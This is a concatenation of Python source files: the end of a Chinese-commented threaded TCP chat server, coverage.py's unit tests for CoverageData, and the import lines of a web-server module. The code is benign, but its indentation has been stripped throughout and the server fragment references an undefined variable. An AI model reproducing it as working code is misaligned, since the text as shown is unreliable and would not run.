# 设置退出条件
# 所有监听的客户端
self.clients = {}
self.thrs = {}
self.stops = []
except Exception as e:
print("%d is down" % PORT)
return None
def listen_client(self):
while not self.STOP_CHAT:
print(u'等待接入,侦听端口:%d' % (PORT))
self.tcpClientSock, self.addr = self.sock.accept()
print(u'接受连接,客户端地址:', self.addr)
address = self.addr
# 将建立的client socket链接放到列表self.clients中
self.clients[address] = self.tcpClientSock
# 分别将每个建立的链接放入进程中,接收且分发消息
self.thrs[address] = threading.Thread(target=self.readmsg, args=[address])
self.thrs[address].start()
time.sleep(0.5)
#self.tcpClientSock.send(b'you are connect...')
print(u'系統結束')
def readmsg(self, address):
# 如果地址不存在,则返回False
if address not in self.clients:
return False
# 得到发送消息的client socket
client = self.clients[address]
while True:
try:
# 获取到消息内容data
data = client.recv(BUFSIZ)
except:
print(error)
self.close_client(address)
break
if not data:
break
# python3使用bytes,所以要进行编码
# s='%s发送给我的信息是:[%s] %s' %(addr[0],ctime(), data.decode('utf8'))
# 对日期进行一下格式化
ISOTIMEFORMAT = '%Y-%m-%d %X'
stime = time.strftime(ISOTIMEFORMAT, localtime())
print([address], '@',[stime],':', data.decode('utf8'))
self.STOP_CHAT = (data.decode('utf8').upper() == "QUIT")
if self.STOP_CHAT:
print("quit")
self.close_client(address)
print("already quit")
break
def close_client(self, address):
try:
'''
print(u'try leave')
client = self.clients.pop(address)
print(u'try leave1')
self.stops.append(address)
print(u'try leave2')
client.close()
print(u'try leave3')
'''
for k in self.clients:
print(u'try leave')
print(u'try client1:', [self.clients[k]])
print(u'try client2:', [self.clients[address]])
print(u'try client3:', [k])
print(u'try client4:', [address])
client = self.clients.pop(k)
#print(u'try leave1')
#self.stops.append(k)
print(u'try leave2')
client.close()
print(u'try leave3')
'''
print(u'try leave4:client:',[self.clients[k]])
self.clients[k].send(str(address) + u"已经离开了")
'''
except:
print(u'try fault')
pass
print(str(address) + u'已经退出')
tserver = None
while tserver == None:
tserver = TcpServer()
tserver.listen_client()
print(u'系統結束')
|
test_data.py
|
# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/nedbat/coveragepy/blob/master/NOTICE.txt
"""Tests for coverage.data"""
import glob
import os
import os.path
import re
import sqlite3
import threading
from unittest import mock
import pytest
from coverage.data import CoverageData, combine_parallel_data
from coverage.data import add_data_to_hash, line_counts
from coverage.debug import DebugControlString
from coverage.exceptions import DataError, NoDataError
from coverage.files import PathAliases, canonical_filename
from tests.coveragetest import CoverageTest
from tests.helpers import assert_count_equal
LINES_1 = {
'a.py': {1, 2},
'b.py': {3},
}
SUMMARY_1 = {'a.py': 2, 'b.py': 1}
MEASURED_FILES_1 = ['a.py', 'b.py']
A_PY_LINES_1 = [1, 2]
B_PY_LINES_1 = [3]
LINES_2 = {
'a.py': {1, 5},
'c.py': {17},
}
SUMMARY_1_2 = {'a.py': 3, 'b.py': 1, 'c.py': 1}
MEASURED_FILES_1_2 = ['a.py', 'b.py', 'c.py']
ARCS_3 = {
'x.py': {(-1, 1), (1, 2), (2, 3), (3, -1)},
'y.py': {(-1, 17), (17, 23), (23, -1)},
}
X_PY_ARCS_3 = [(-1, 1), (1, 2), (2, 3), (3, -1)]
Y_PY_ARCS_3 = [(-1, 17), (17, 23), (23, -1)]
SUMMARY_3 = {'x.py': 3, 'y.py': 2}
MEASURED_FILES_3 = ['x.py', 'y.py']
X_PY_LINES_3 = [1, 2, 3]
Y_PY_LINES_3 = [17, 23]
ARCS_4 = {
'x.py': {(-1, 2), (2, 5), (5, -1)},
'z.py': {(-1, 1000), (1000, -1)},
}
SUMMARY_3_4 = {'x.py': 4, 'y.py': 2, 'z.py': 1}
MEASURED_FILES_3_4 = ['x.py', 'y.py', 'z.py']
def DebugCoverageData(*args, **kwargs):
"""Factory for CovergeData instances with debugging turned on.
This lets us exercise the debugging lines in sqldata.py. We don't make
any assertions about the debug output, but at least we can know that they
execute successfully, and they won't be marked as distracting missing
lines in our coverage reports.
"""
assert "debug" not in kwargs
options = ["dataio", "dataop", "sql"]
if kwargs:
# There's no reason kwargs should imply sqldata debugging.
# This is a way to get a mix of debug options across the tests.
options.extend(["sqldata"])
debug = DebugControlString(options=options)
return CoverageData(*args, debug=debug, **kwargs)
def assert_line_counts(covdata, counts, fullpath=False):
"""Check that the line_counts of `covdata` is `counts`."""
assert line_counts(covdata, fullpath) == counts
def assert_measured_files(covdata, measured):
"""Check that `covdata`'s measured files are `measured`."""
assert_count_equal(covdata.measured_files(), measured)
def assert_lines1_data(covdata):
"""Check that `covdata` has the data from LINES1."""
assert_line_counts(covdata, SUMMARY_1)
assert_measured_files(covdata, MEASURED_FILES_1)
assert_count_equal(covdata.lines("a.py"), A_PY_LINES_1)
assert not covdata.has_arcs()
def assert_arcs3_data(covdata):
"""Check that `covdata` has the data from ARCS3."""
assert_line_counts(covdata, SUMMARY_3)
assert_measured_files(covdata, MEASURED_FILES_3)
assert_count_equal(covdata.lines("x.py"), X_PY_LINES_3)
assert_count_equal(covdata.arcs("x.py"), X_PY_ARCS_3)
assert_count_equal(covdata.lines("y.py"), Y_PY_LINES_3)
assert_count_equal(covdata.arcs("y.py"), Y_PY_ARCS_3)
assert covdata.has_arcs()
def dicts_from_sets(file_data):
"""Convert a dict of sets into a dict of dicts.
Before 6.0, file data was a dict with None as the values. In 6.0, file
data is a set. SqlData all along only cared that it was an iterable.
This function helps us test that the old dict format still works.
"""
return {k: dict.fromkeys(v) for k, v in file_data.items()}
class CoverageDataTest(CoverageTest):
"""Test cases for CoverageData."""
def test_empty_data_is_false(self):
covdata = DebugCoverageData()
assert not covdata
self.assert_doesnt_exist(".coverage")
def test_empty_data_is_false_when_read(self):
covdata = DebugCoverageData()
covdata.read()
assert not covdata
self.assert_doesnt_exist(".coverage")
def test_line_data_is_true(self):
covdata = DebugCoverageData()
covdata.add_lines(LINES_1)
assert covdata
def test_arc_data_is_true(self):
covdata = DebugCoverageData()
covdata.add_arcs(ARCS_3)
assert covdata
def test_empty_line_data_is_false(self):
covdata = DebugCoverageData()
covdata.add_lines({})
assert not covdata
def test_empty_arc_data_is_false(self):
covdata = DebugCoverageData()
covdata.add_arcs({})
assert not covdata
@pytest.mark.parametrize("lines", [LINES_1, dicts_from_sets(LINES_1)])
def test_adding_lines(self, lines):
covdata = DebugCoverageData()
covdata.add_lines(lines)
assert_lines1_data(covdata)
@pytest.mark.parametrize("arcs", [ARCS_3, dicts_from_sets(ARCS_3)])
def test_adding_arcs(self, arcs):
covdata = DebugCoverageData()
covdata.add_arcs(arcs)
assert_arcs3_data(covdata)
def test_ok_to_add_lines_twice(self):
covdata = DebugCoverageData()
covdata.add_lines(LINES_1)
covdata.add_lines(LINES_2)
assert_line_counts(covdata, SUMMARY_1_2)
assert_measured_files(covdata, MEASURED_FILES_1_2)
def test_ok_to_add_arcs_twice(self):
covdata = DebugCoverageData()
covdata.add_arcs(ARCS_3)
covdata.add_arcs(ARCS_4)
assert_line_counts(covdata, SUMMARY_3_4)
assert_measured_files(covdata, MEASURED_FILES_3_4)
@pytest.mark.parametrize("klass", [CoverageData, DebugCoverageData])
def test_cant_add_arcs_with_lines(self, klass):
covdata = klass()
covdata.add_lines(LINES_1)
msg = "Can't add branch measurements to existing line data"
with pytest.raises(DataError, match=msg):
covdata.add_arcs(ARCS_3)
@pytest.mark.parametrize("klass", [CoverageData, DebugCoverageData])
def test_cant_add_lines_with_arcs(self, klass):
covdata = klass()
covdata.add_arcs(ARCS_3)
msg = "Can't add line measurements to existing branch data"
with pytest.raises(DataError, match=msg):
covdata.add_lines(LINES_1)
def test_touch_file_with_lines(self):
covdata = DebugCoverageData()
covdata.add_lines(LINES_1)
covdata.touch_file('zzz.py')
assert_measured_files(covdata, MEASURED_FILES_1 + ['zzz.py'])
def test_touch_file_with_arcs(self):
covdata = DebugCoverageData()
covdata.add_arcs(ARCS_3)
covdata.touch_file('zzz.py')
assert_measured_files(covdata, MEASURED_FILES_3 + ['zzz.py'])
def test_set_query_contexts(self):
covdata = DebugCoverageData()
covdata.set_context('test_a')
covdata.add_lines(LINES_1)
covdata.set_query_contexts(['te.*a'])
assert covdata.lines('a.py') == [1, 2]
covdata.set_query_contexts(['other'])
assert covdata.lines('a.py') == []
def test_no_lines_vs_unmeasured_file(self):
covdata = DebugCoverageData()
covdata.add_lines(LINES_1)
covdata.touch_file('zzz.py')
assert covdata.lines('zzz.py') == []
assert covdata.lines('no_such_file.py') is None
def test_lines_with_contexts(self):
covdata = DebugCoverageData()
covdata.set_context('test_a')
covdata.add_lines(LINES_1)
assert covdata.lines('a.py') == [1, 2]
covdata.set_query_contexts(['test'])
assert covdata.lines('a.py') == [1, 2]
covdata.set_query_contexts(['other'])
assert covdata.lines('a.py') == []
def test_contexts_by_lineno_with_lines(self):
covdata = DebugCoverageData()
covdata.set_context('test_a')
covdata.add_lines(LINES_1)
expected = {1: ['test_a'], 2: ['test_a']}
assert covdata.contexts_by_lineno('a.py') == expected
@pytest.mark.parametrize("lines", [LINES_1, dicts_from_sets(LINES_1)])
def test_no_duplicate_lines(self, lines):
covdata = DebugCoverageData()
covdata.set_context("context1")
covdata.add_lines(lines)
covdata.set_context("context2")
covdata.add_lines(lines)
assert covdata.lines('a.py') == A_PY_LINES_1
@pytest.mark.parametrize("arcs", [ARCS_3, dicts_from_sets(ARCS_3)])
def test_no_duplicate_arcs(self, arcs):
covdata = DebugCoverageData()
covdata.set_context("context1")
covdata.add_arcs(arcs)
covdata.set_context("context2")
covdata.add_arcs(arcs)
assert covdata.arcs('x.py') == X_PY_ARCS_3
def test_no_arcs_vs_unmeasured_file(self):
covdata = DebugCoverageData()
covdata.add_arcs(ARCS_3)
covdata.touch_file('zzz.py')
assert covdata.lines('zzz.py') == []
assert covdata.lines('no_such_file.py') is None
assert covdata.arcs('zzz.py') == []
assert covdata.arcs('no_such_file.py') is None
def test_arcs_with_contexts(self):
covdata = DebugCoverageData()
covdata.set_context('test_x')
covdata.add_arcs(ARCS_3)
assert covdata.arcs('x.py') == [(-1, 1), (1, 2), (2, 3), (3, -1)]
covdata.set_query_contexts(['test_.$'])
assert covdata.arcs('x.py') == [(-1, 1), (1, 2), (2, 3), (3, -1)]
covdata.set_query_contexts(['other'])
assert covdata.arcs('x.py') == []
def test_contexts_by_lineno_with_arcs(self):
covdata = DebugCoverageData()
covdata.set_context('test_x')
covdata.add_arcs(ARCS_3)
expected = {1: ['test_x'], 2: ['test_x'], 3: ['test_x']}
assert covdata.contexts_by_lineno('x.py') == expected
def test_contexts_by_lineno_with_unknown_file(self):
covdata = DebugCoverageData()
covdata.set_context('test_x')
covdata.add_arcs(ARCS_3)
assert covdata.contexts_by_lineno('xyz.py') == {}
def test_context_by_lineno_with_query_contexts_with_lines(self):
covdata = DebugCoverageData()
covdata.set_context("test_1")
covdata.add_lines(LINES_1)
covdata.set_context("test_2")
covdata.add_lines(LINES_2)
covdata.set_query_context("test_1")
assert covdata.contexts_by_lineno("a.py") == dict.fromkeys([1,2], ["test_1"])
def test_context_by_lineno_with_query_contexts_with_arcs(self):
covdata = DebugCoverageData()
covdata.set_context("test_1")
covdata.add_arcs(ARCS_3)
covdata.set_context("test_2")
covdata.add_arcs(ARCS_4)
covdata.set_query_context("test_1")
assert covdata.contexts_by_lineno("x.py") == dict.fromkeys([1,2,3], ["test_1"])
def test_file_tracer_name(self):
covdata = DebugCoverageData()
covdata.add_lines({
"p1.foo": [1, 2, 3],
"p2.html": [10, 11, 12],
"main.py": [20],
})
covdata.add_file_tracers({"p1.foo": "p1.plugin", "p2.html": "p2.plugin"})
assert covdata.file_tracer("p1.foo") == "p1.plugin"
assert covdata.file_tracer("p2.html") == "p2.plugin"
assert covdata.file_tracer("main.py") == ""
assert covdata.file_tracer("p3.not_here") is None
def test_ok_to_repeat_file_tracer(self):
covdata = DebugCoverageData()
covdata.add_lines({
"p1.foo": [1, 2, 3],
"p2.html": [10, 11, 12],
})
covdata.add_file_tracers({"p1.foo": "p1.plugin", "p2.html": "p2.plugin"})
covdata.add_file_tracers({"p1.foo": "p1.plugin"})
assert covdata.file_tracer("p1.foo") == "p1.plugin"
def test_ok_to_set_empty_file_tracer(self):
covdata = DebugCoverageData()
covdata.add_lines({
"p1.foo": [1, 2, 3],
"p2.html": [10, 11, 12],
"main.py": [20],
})
covdata.add_file_tracers({"p1.foo": "p1.plugin", "main.py": ""})
assert covdata.file_tracer("p1.foo") == "p1.plugin"
assert covdata.file_tracer("main.py") == ""
def test_cant_file_tracer_unmeasured_files(self):
covdata = DebugCoverageData()
msg = "Can't add file tracer data for unmeasured file 'p1.foo'"
with pytest.raises(DataError, match=msg):
covdata.add_file_tracers({"p1.foo": "p1.plugin"})
covdata.add_lines({"p2.html": [10, 11, 12]})
with pytest.raises(DataError, match=msg):
covdata.add_file_tracers({"p1.foo": "p1.plugin"})
def test_cant_change_file_tracer_name(self):
covdata = DebugCoverageData()
covdata.add_lines({"p1.foo": [1, 2, 3]})
covdata.add_file_tracers({"p1.foo": "p1.plugin"})
msg = "Conflicting file tracer name for 'p1.foo': 'p1.plugin' vs 'p1.plugin.foo'"
with pytest.raises(DataError, match=msg):
covdata.add_file_tracers({"p1.foo": "p1.plugin.foo"})
def test_update_lines(self):
covdata1 = DebugCoverageData(suffix='1')
covdata1.add_lines(LINES_1)
covdata2 = DebugCoverageData(suffix='2')
covdata2.add_lines(LINES_2)
covdata3 = DebugCoverageData(suffix='3')
covdata3.update(covdata1)
covdata3.update(covdata2)
assert_line_counts(covdata3, SUMMARY_1_2)
assert_measured_files(covdata3, MEASURED_FILES_1_2)
def test_update_arcs(self):
covdata1 = DebugCoverageData(suffix='1')
covdata1.add_arcs(ARCS_3)
covdata2 = DebugCoverageData(suffix='2')
covdata2.add_arcs(ARCS_4)
covdata3 = DebugCoverageData(suffix='3')
covdata3.update(covdata1)
covdata3.update(covdata2)
assert_line_counts(covdata3, SUMMARY_3_4)
assert_measured_files(covdata3, MEASURED_FILES_3_4)
def test_update_cant_mix_lines_and_arcs(self):
covdata1 = DebugCoverageData(suffix='1')
covdata1.add_lines(LINES_1)
covdata2 = DebugCoverageData(suffix='2')
covdata2.add_arcs(ARCS_3)
with pytest.raises(DataError, match="Can't combine arc data with line data"):
covdata1.update(covdata2)
with pytest.raises(DataError, match="Can't combine line data with arc data"):
covdata2.update(covdata1)
def test_update_file_tracers(self):
covdata1 = DebugCoverageData(suffix='1')
covdata1.add_lines({
"p1.html": [1, 2, 3, 4],
"p2.html": [5, 6, 7],
"main.py": [10, 11, 12],
})
covdata1.add_file_tracers({
"p1.html": "html.plugin",
"p2.html": "html.plugin2",
})
covdata2 = DebugCoverageData(suffix='2')
covdata2.add_lines({
"p1.html": [3, 4, 5, 6],
"p2.html": [7, 8, 9],
"p3.foo": [1000, 1001],
"main.py": [10, 11, 12],
})
covdata2.add_file_tracers({
"p1.html": "html.plugin",
"p2.html": "html.plugin2",
"p3.foo": "foo_plugin",
})
covdata3 = DebugCoverageData(suffix='3')
covdata3.update(covdata1)
covdata3.update(covdata2)
assert covdata3.file_tracer("p1.html") == "html.plugin"
assert covdata3.file_tracer("p2.html") == "html.plugin2"
assert covdata3.file_tracer("p3.foo") == "foo_plugin"
assert covdata3.file_tracer("main.py") == ""
def test_update_conflicting_file_tracers(self):
covdata1 = DebugCoverageData(suffix='1')
covdata1.add_lines({"p1.html": [1, 2, 3]})
covdata1.add_file_tracers({"p1.html": "html.plugin"})
covdata2 = DebugCoverageData(suffix='2')
covdata2.add_lines({"p1.html": [1, 2, 3]})
covdata2.add_file_tracers({"p1.html": "html.other_plugin"})
msg = "Conflicting file tracer name for 'p1.html': 'html.plugin' vs 'html.other_plugin'"
with pytest.raises(DataError, match=msg):
covdata1.update(covdata2)
msg = "Conflicting file tracer name for 'p1.html': 'html.other_plugin' vs 'html.plugin'"
with pytest.raises(DataError, match=msg):
covdata2.update(covdata1)
def test_update_file_tracer_vs_no_file_tracer(self):
covdata1 = DebugCoverageData(suffix="1")
covdata1.add_lines({"p1.html": [1, 2, 3]})
covdata1.add_file_tracers({"p1.html": "html.plugin"})
covdata2 = DebugCoverageData(suffix="2")
covdata2.add_lines({"p1.html": [1, 2, 3]})
msg = "Conflicting file tracer name for 'p1.html': 'html.plugin' vs ''"
with pytest.raises(DataError, match=msg):
covdata1.update(covdata2)
msg = "Conflicting file tracer name for 'p1.html': '' vs 'html.plugin'"
with pytest.raises(DataError, match=msg):
covdata2.update(covdata1)
def test_update_lines_empty(self):
covdata1 = DebugCoverageData(suffix='1')
covdata1.add_lines(LINES_1)
covdata2 = DebugCoverageData(suffix='2')
covdata1.update(covdata2)
assert_line_counts(covdata1, SUMMARY_1)
def test_update_arcs_empty(self):
covdata1 = DebugCoverageData(suffix='1')
covdata1.add_arcs(ARCS_3)
covdata2 = DebugCoverageData(suffix='2')
covdata1.update(covdata2)
assert_line_counts(covdata1, SUMMARY_3)
def test_asking_isnt_measuring(self):
# Asking about an unmeasured file shouldn't make it seem measured.
covdata = DebugCoverageData()
assert_measured_files(covdata, [])
assert covdata.arcs("missing.py") is None
assert_measured_files(covdata, [])
def test_add_to_hash_with_lines(self):
covdata = DebugCoverageData()
covdata.add_lines(LINES_1)
hasher = mock.Mock()
add_data_to_hash(covdata, "a.py", hasher)
assert hasher.method_calls == [
mock.call.update([1, 2]), # lines
mock.call.update(""), # file_tracer name
]
def test_add_to_hash_with_arcs(self):
covdata = DebugCoverageData()
covdata.add_arcs(ARCS_3)
covdata.add_file_tracers({"y.py": "hologram_plugin"})
hasher = mock.Mock()
add_data_to_hash(covdata, "y.py", hasher)
assert hasher.method_calls == [
mock.call.update([(-1, 17), (17, 23), (23, -1)]), # arcs
mock.call.update("hologram_plugin"), # file_tracer name
]
def test_add_to_lines_hash_with_missing_file(self):
# https://github.com/nedbat/coveragepy/issues/403
covdata = DebugCoverageData()
covdata.add_lines(LINES_1)
hasher = mock.Mock()
add_data_to_hash(covdata, "missing.py", hasher)
assert hasher.method_calls == [
mock.call.update([]),
mock.call.update(None),
]
def test_add_to_arcs_hash_with_missing_file(self):
# https://github.com/nedbat/coveragepy/issues/403
covdata = DebugCoverageData()
covdata.add_arcs(ARCS_3)
covdata.add_file_tracers({"y.py": "hologram_plugin"})
hasher = mock.Mock()
add_data_to_hash(covdata, "missing.py", hasher)
assert hasher.method_calls == [
mock.call.update([]),
mock.call.update(None),
]
def test_empty_lines_are_still_lines(self):
covdata = DebugCoverageData()
covdata.add_lines({})
covdata.touch_file("abc.py")
assert not covdata.has_arcs()
def test_empty_arcs_are_still_arcs(self):
covdata = DebugCoverageData()
covdata.add_arcs({})
covdata.touch_file("abc.py")
assert covdata.has_arcs()
def test_cant_touch_in_empty_data(self):
covdata = DebugCoverageData()
msg = "Can't touch files in an empty CoverageData"
with pytest.raises(DataError, match=msg):
covdata.touch_file("abc.py")
def test_read_and_write_are_opposites(self):
covdata1 = DebugCoverageData()
covdata1.add_arcs(ARCS_3)
covdata1.write()
covdata2 = DebugCoverageData()
covdata2.read()
assert_arcs3_data(covdata2)
def test_thread_stress(self):
covdata = DebugCoverageData()
exceptions = []
def thread_main():
"""Every thread will try to add the same data."""
try:
covdata.add_lines(LINES_1)
except Exception as ex: # pragma: only failure
exceptions.append(ex)
threads = [threading.Thread(target=thread_main) for _ in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
assert_lines1_data(covdata)
assert not exceptions
class CoverageDataInTempDirTest(CoverageTest):
"""Tests of CoverageData that need a temporary directory to make files."""
def test_read_write_lines(self):
covdata1 = DebugCoverageData("lines.dat")
covdata1.add_lines(LINES_1)
covdata1.write()
covdata2 = DebugCoverageData("lines.dat")
covdata2.read()
assert_lines1_data(covdata2)
def test_read_write_arcs(self):
covdata1 = DebugCoverageData("arcs.dat")
covdata1.add_arcs(ARCS_3)
covdata1.write()
covdata2 = DebugCoverageData("arcs.dat")
covdata2.read()
assert_arcs3_data(covdata2)
def test_read_errors(self):
self.make_file("xyzzy.dat", "xyzzy")
with pytest.raises(DataError, match=r"Couldn't .* '.*[/\\]xyzzy.dat': \S+"):
covdata = DebugCoverageData("xyzzy.dat")
covdata.read()
assert not covdata
def test_hard_read_error(self):
self.make_file("noperms.dat", "go away")
os.chmod("noperms.dat", 0)
with pytest.raises(DataError, match=r"Couldn't .* '.*[/\\]noperms.dat': \S+"):
covdata = DebugCoverageData("noperms.dat")
covdata.read()
@pytest.mark.parametrize("klass", [CoverageData, DebugCoverageData])
def test_error_when_closing(self, klass):
msg = r"Couldn't .* '.*[/\\]flaked.dat': \S+"
with pytest.raises(DataError, match=msg):
covdata = klass("flaked.dat")
covdata.add_lines(LINES_1)
# I don't know how to make a real error, so let's fake one.
sqldb = list(covdata._dbs.values())[0]
sqldb.close = lambda: 1/0
covdata.add_lines(LINES_1)
def test_wrong_schema_version(self):
with sqlite3.connect("wrong_schema.db") as con:
con.execute("create table coverage_schema (version integer)")
con.execute("insert into coverage_schema (version) values (99)")
msg = r"Couldn't .* '.*[/\\]wrong_schema.db': wrong schema: 99 instead of \d+"
with pytest.raises(DataError, match=msg):
covdata = DebugCoverageData("wrong_schema.db")
covdata.read()
assert not covdata
def test_wrong_schema_schema(self):
with sqlite3.connect("wrong_schema_schema.db") as con:
con.execute("create table coverage_schema (xyzzy integer)")
con.execute("insert into coverage_schema (xyzzy) values (99)")
msg = r"Data file .* doesn't seem to be a coverage data file: .* no such column"
with pytest.raises(DataError, match=msg):
covdata = DebugCoverageData("wrong_schema_schema.db")
covdata.read()
assert not covdata
class CoverageDataFilesTest(CoverageTest):
"""Tests of CoverageData file handling."""
def test_reading_missing(self):
self.assert_doesnt_exist(".coverage")
covdata = DebugCoverageData()
covdata.read()
assert_line_counts(covdata, {})
def test_writing_and_reading(self):
covdata1 = DebugCoverageData()
covdata1.add_lines(LINES_1)
covdata1.write()
covdata2 = DebugCoverageData()
covdata2.read()
assert_line_counts(covdata2, SUMMARY_1)
def test_debug_output_with_debug_option(self):
# With debug option dataio, we get debug output about reading and
# writing files.
debug = DebugControlString(options=["dataio"])
covdata1 = CoverageData(debug=debug)
covdata1.add_lines(LINES_1)
covdata1.write()
covdata2 = CoverageData(debug=debug)
covdata2.read()
assert_line_counts(covdata2, SUMMARY_1)
assert re.search(
r"^Erasing data file '.*\.coverage'\n" +
r"Opening data file '.*\.coverage'\n" +
r"Initing data file '.*\.coverage'\n" +
r"Opening data file '.*\.coverage'\n$",
debug.get_output()
)
def test_debug_output_without_debug_option(self):
# With a debug object, but not the dataio option, we don't get debug
# output.
debug = DebugControlString(options=[])
covdata1 = CoverageData(debug=debug)
covdata1.add_lines(LINES_1)
covdata1.write()
covdata2 = CoverageData(debug=debug)
covdata2.read()
assert_line_counts(covdata2, SUMMARY_1)
assert debug.get_output() == ""
def test_explicit_suffix(self):
self.assert_doesnt_exist(".coverage.SUFFIX")
covdata = DebugCoverageData(suffix='SUFFIX')
covdata.add_lines(LINES_1)
covdata.write()
self.assert_exists(".coverage.SUFFIX")
self.assert_doesnt_exist(".coverage")
def test_true_suffix(self):
self.assert_file_count(".coverage.*", 0)
# suffix=True will make a randomly named data file.
covdata1 = DebugCoverageData(suffix=True)
covdata1.add_lines(LINES_1)
covdata1.write()
self.assert_doesnt_exist(".coverage")
data_files1 = glob.glob(".coverage.*")
assert len(data_files1) == 1
# Another suffix=True will choose a different name.
covdata2 = DebugCoverageData(suffix=True)
covdata2.add_lines(LINES_1)
covdata2.write()
self.assert_doesnt_exist(".coverage")
data_files2 = glob.glob(".coverage.*")
assert len(data_files2) == 2
# In addition to being different, the suffixes have the pid in them.
assert all(str(os.getpid()) in fn for fn in data_files2)
def test_combining(self):
self.assert_file_count(".coverage.*", 0)
covdata1 = DebugCoverageData(suffix='1')
covdata1.add_lines(LINES_1)
covdata1.write()
self.assert_exists(".coverage.1")
self.assert_file_count(".coverage.*", 1)
covdata2 = DebugCoverageData(suffix='2')
covdata2.add_lines(LINES_2)
covdata2.write()
self.assert_exists(".coverage.2")
self.assert_file_count(".coverage.*", 2)
covdata3 = DebugCoverageData()
combine_parallel_data(covdata3)
assert_line_counts(covdata3, SUMMARY_1_2)
assert_measured_files(covdata3, MEASURED_FILES_1_2)
self.assert_file_count(".coverage.*", 0)
def test_erasing(self):
covdata1 = DebugCoverageData()
covdata1.add_lines(LINES_1)
covdata1.write()
covdata1.erase()
assert_line_counts(covdata1, {})
covdata2 = DebugCoverageData()
covdata2.read()
assert_line_counts(covdata2, {})
def test_erasing_parallel(self):
self.make_file("datafile.1")
self.make_file("datafile.2")
self.make_file(".coverage")
data = DebugCoverageData("datafile")
data.erase(parallel=True)
self.assert_file_count("datafile.*", 0)
self.assert_exists(".coverage")
def test_combining_with_aliases(self):
covdata1 = DebugCoverageData(suffix='1')
covdata1.add_lines({
'/home/ned/proj/src/a.py': {1, 2},
'/home/ned/proj/src/sub/b.py': {3},
'/home/ned/proj/src/template.html': {10},
})
covdata1.add_file_tracers({
'/home/ned/proj/src/template.html': 'html.plugin',
})
covdata1.write()
covdata2 = DebugCoverageData(suffix='2')
covdata2.add_lines({
r'c:\ned\test\a.py': {4, 5},
r'c:\ned\test\sub\b.py': {3, 6},
})
covdata2.write()
self.assert_file_count(".coverage.*", 2)
covdata3 = DebugCoverageData()
aliases = PathAliases()
aliases.add("/home/ned/proj/src/", "./")
aliases.add(r"c:\ned\test", "./")
combine_parallel_data(covdata3, aliases=aliases)
self.assert_file_count(".coverage.*", 0)
# covdata3 hasn't been written yet. Should this file exist or not?
#self.assert_exists(".coverage")
apy = canonical_filename('./a.py')
sub_bpy = canonical_filename('./sub/b.py')
template_html = canonical_filename('./template.html')
assert_line_counts(covdata3, {apy: 4, sub_bpy: 2, template_html: 1}, fullpath=True)
assert_measured_files(covdata3, [apy, sub_bpy, template_html])
assert covdata3.file_tracer(template_html) == 'html.plugin'
def test_combining_from_different_directories(self):
os.makedirs('cov1')
covdata1 = DebugCoverageData('cov1/.coverage.1')
covdata1.add_lines(LINES_1)
covdata1.write()
os.makedirs('cov2')
covdata2 = DebugCoverageData('cov2/.coverage.2')
covdata2.add_lines(LINES_2)
covdata2.write()
# This data won't be included.
covdata_xxx = DebugCoverageData('.coverage.xxx')
covdata_xxx.add_arcs(ARCS_3)
covdata_xxx.write()
covdata3 = DebugCoverageData()
combine_parallel_data(covdata3, data_paths=['cov1', 'cov2'])
assert_line_counts(covdata3, SUMMARY_1_2)
assert_measured_files(covdata3, MEASURED_FILES_1_2)
self.assert_doesnt_exist("cov1/.coverage.1")
self.assert_doesnt_exist("cov2/.coverage.2")
self.assert_exists(".coverage.xxx")
def test_combining_from_files(self):
os.makedirs('cov1')
covdata1 = DebugCoverageData('cov1/.coverage.1')
covdata1.add_lines(LINES_1)
covdata1.write()
os.makedirs('cov2')
covdata2 = DebugCoverageData('cov2/.coverage.2')
covdata2.add_lines(LINES_2)
covdata2.write()
# This data won't be included.
covdata_xxx = DebugCoverageData('.coverage.xxx')
covdata_xxx.add_arcs(ARCS_3)
covdata_xxx.write()
covdata_2xxx = DebugCoverageData('cov2/.coverage.xxx')
covdata_2xxx.add_arcs(ARCS_3)
covdata_2xxx.write()
covdata3 = DebugCoverageData()
combine_parallel_data(covdata3, data_paths=['cov1', 'cov2/.coverage.2'])
assert_line_counts(covdata3, SUMMARY_1_2)
assert_measured_files(covdata3, MEASURED_FILES_1_2)
self.assert_doesnt_exist("cov1/.coverage.1")
self.assert_doesnt_exist("cov2/.coverage.2")
self.assert_exists(".coverage.xxx")
self.assert_exists("cov2/.coverage.xxx")
def test_combining_from_nonexistent_directories(self):
covdata = DebugCoverageData()
msg = "Couldn't combine from non-existent path 'xyzzy'"
with pytest.raises(NoDataError, match=msg):
combine_parallel_data(covdata, data_paths=['xyzzy'])
def test_interleaved_erasing_bug716(self):
# pytest-cov could produce this scenario. #716
covdata1 = DebugCoverageData()
covdata2 = DebugCoverageData()
# this used to create the .coverage database file..
covdata2.set_context("")
# then this would erase it all..
covdata1.erase()
# then this would try to use tables that no longer exist.
# "no such table: meta"
covdata2.add_lines(LINES_1)
class DumpsLoadsTest(CoverageTest):
"""Tests of CoverageData.dumps and loads."""
run_in_temp_dir = False
@pytest.mark.parametrize("klass", [CoverageData, DebugCoverageData])
def test_serialization(self, klass):
covdata1 = klass(no_disk=True)
covdata1.add_lines(LINES_1)
covdata1.add_lines(LINES_2)
serial = covdata1.dumps()
covdata2 = klass(no_disk=True)
covdata2.loads(serial)
assert_line_counts(covdata2, SUMMARY_1_2)
assert_measured_files(covdata2, MEASURED_FILES_1_2)
def test_misfed_serialization(self):
covdata = CoverageData(no_disk=True)
bad_data = b'Hello, world!\x07 ' + b'z' * 100
msg = r"Unrecognized serialization: {} \(head of {} bytes\)".format(
re.escape(repr(bad_data[:40])),
len(bad_data),
)
with pytest.raises(DataError, match=msg):
covdata.loads(bad_data)
class NoDiskTest(CoverageTest):
"""Tests of in-memory CoverageData."""
run_in_temp_dir = False
def test_updating(self):
# https://github.com/nedbat/coveragepy/issues/1323
a = CoverageData(no_disk=True)
a.add_lines({'foo.py': [10, 20, 30]})
assert a.measured_files() == {'foo.py'}
b = CoverageData(no_disk=True)
b.update(a)
assert b.measured_files() == {'foo.py'}
|
ic4vc_webserver.py
|
'''
Created on Oct 18, 2011
@author: IslamM
'''
from threading import Thread
import web, os
from web.wsgiserver import CherryPyWSGIServer
from suds.sudsobject import Object as SudsObject
from logging import getLogger
log = getLogger(__name__)
from util import catalog
from util.config import config
import json
from portlets.host import Host
from portlets.cva import cva
from portlets.network import Network
from portlets import cluster
from engines.deployment_connector import ALDeploymentConnector
from vmware.vcenter import vCenter
from time import sleep
from engines.firmware import HostFirmware
from util.smartcomponent import get_scm
